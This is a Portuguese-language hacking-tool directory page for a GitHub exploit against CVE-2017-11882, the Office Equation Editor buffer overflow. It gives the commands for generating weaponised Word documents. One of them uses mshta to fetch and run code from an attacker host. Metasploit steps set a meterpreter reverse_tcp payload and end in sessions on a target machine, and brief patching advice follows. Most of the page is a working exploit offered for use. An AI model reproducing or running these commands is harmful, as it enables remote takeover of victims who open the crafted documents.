Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-11882 — CVE-2017-11882(通杀Office 2003到2016) | Kitploit
Ferramentas/GitHubGitHub/littlebin404/cve-2017-11882
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHublittlebin404/cve-2017-11882

CVE-2017-11882

CVE-2017-11882(通杀Office 2003到2016)

Ver Repositório
53há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Visão Geral do CVE-2017-11882

Do ponto de vista do efeito da exploração, ele pode afetar todas as versões do Office 2003 ao 2016, e todo o ambiente de ataque é muito simples de construir. Esta vulnerabilidade é causada pelo [Editor de Equações] dentro do software Office, pois o processo do editor não verifica o comprimento do nome, resultando em um estouro de buffer. Um atacante pode construir caracteres especiais para executar código arbitrário. Por exemplo, se um hacker explorar essa vulnerabilidade e construir um arquivo Office com uma backdoor de shell, quando um usuário comum abrir esse arquivo Office, o computador pode ser controlado diretamente pelo hacker.

Versões Afetadas:

root@kitploit:~
office 2003 
office 2007 
office 2010 
office 2013 
office 2016

Uso

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Image

Clique no arquivo "test.doc" gerado e a calculadora do computador será exibida com sucesso.

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc

Image

Image

O arquivo Word 11882-3.doc foi gerado com sucesso.

Coloque o arquivo cve_2017_11882.rb no diretório /usr/share/metasploit-framework/modules/exploits/windows/smb:

root@kitploit:~
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp 
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165 
msf exploit(CVE-2017-11882) > set uripath 11882 
msf exploit(CVE-2017-11882) > exploit

Estado de escuta ativado:

Image

Clique no arquivo 11882-3.doc na máquina alvo Windows 7 e obtenha sessões com sucesso!

Image

Correção da Vulnerabilidade

① Atualização online; ativar o Windows Update. Isso é suficiente para a maioria das pessoas.

② Aplicar patch; o endereço do patch da Microsoft correspondente a esta vulnerabilidade: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

Baixar ferramenta